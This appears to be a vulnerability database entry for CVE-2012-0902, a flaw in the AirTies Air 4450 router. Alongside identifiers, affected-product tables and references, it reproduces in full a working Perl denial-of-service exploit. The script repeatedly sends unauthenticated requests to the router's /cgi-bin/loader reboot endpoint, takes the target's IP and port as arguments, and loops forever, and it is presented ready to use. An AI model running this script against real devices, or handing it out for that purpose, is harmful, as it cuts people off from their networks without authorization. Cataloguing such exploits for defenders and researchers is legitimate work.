ID
VAR-E-201201-0283
CVE
| cve_id: | CVE-2012-0902 | Trust: 1.9 |
EDB ID
18336
TITLE
AirTies-4450 - Unauthorized Remote Reboot (Denial of Service) - Hardware dos Exploit
Trust: 0.6
DESCRIPTION
AirTies-4450 - Unauthorized Remote Reboot (Denial of Service). CVE-78616CVE-2012-0902 . dos exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | airties 4450 | model: | - | scope: | - | version: | - | Trust: 1.0 |
| vendor: | airties | model: | air | scope: | eq | version: | 44500 | Trust: 0.3 |
EXPLOIT
#!/usr/bin/perl
#
# Title: AirTies-4450 Unauthorized Remote Reboot [DoS].
# Type: hardware
# Tested on firmware: AirTies_Air4450_RU_FW_1.1.2.18.bin
#
# Author: rigan - imrigan [sobachka] gmail.com
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
# The description of the device from a site of the vendor:
#
# With its Access Point and Router functionality, the Air 4450 provides wireless Internet access over
# ADSL and Cable modems. Air 4450 uses 802.11n technology providing wireless data transfer
# rates of up to 300 Mbps. Thus, you can transfer data, watch videos or upload your pictures to the
# Internet at “N-speed”. Providing 6 times faster wireless communications compared to earlier
# technologies, and 4 times greater wireless range through use of MIMO technology*, Air 4450 has
# been developed to meet all your wireless needs.
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
# The vulnerability:
#
# http://192.168.1.1/cgi-bin/loader - This cgi script allows to reboot the device via GET request.
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
use LWP::Simple;
print "[*] AirTies Air-4450 Remote Dos Exploit\n";
if (@ARGV != 2){
print "[*] Usage: perl airdos.pl ip port \n";
exit(1);
}
while (@ARGV > 0){
$ip = shift(@ARGV);
$port = shift(@ARGV);
}
$url = "http://".$ip.":".$port."/cgi-bin/".loader;
print "[*] DoS ...............................\n";
while(1){
get($url);
sleep(15);
}
Trust: 1.0
EXPLOIT LANGUAGE
pl
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Unauthorized Remote Reboot (Denial of Service)
Trust: 1.0
CREDITS
rigan
Trust: 0.6
EXTERNAL IDS
| db: | NVD | id: | CVE-2012-0902 | Trust: 1.9 |
| db: | EXPLOIT-DB | id: | 18336 | Trust: 1.6 |
| db: | EDBNET | id: | 40737 | Trust: 0.6 |
| db: | BID | id: | 51320 | Trust: 0.3 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2012-0902 | Trust: 1.6 |
| url: | https://www.exploit-db.com/exploits/18336/ | Trust: 0.6 |
| url: | http://airties.com/product-details.asp?pn=air 4450&ci=1&dil=tr | Trust: 0.3 |
SOURCES
| db: | BID | id: | 51320 |
| db: | EXPLOIT-DB | id: | 18336 |
| db: | EDBNET | id: | 40737 |
LAST UPDATE DATE
2022-07-27T09:43:02.878000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 51320 | date: | 2015-03-19T07:34:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 51320 | date: | 2012-01-08T00:00:00 |
| db: | EXPLOIT-DB | id: | 18336 | date: | 2012-01-08T00:00:00 |
| db: | EDBNET | id: | 40737 | date: | 2012-01-08T00:00:00 |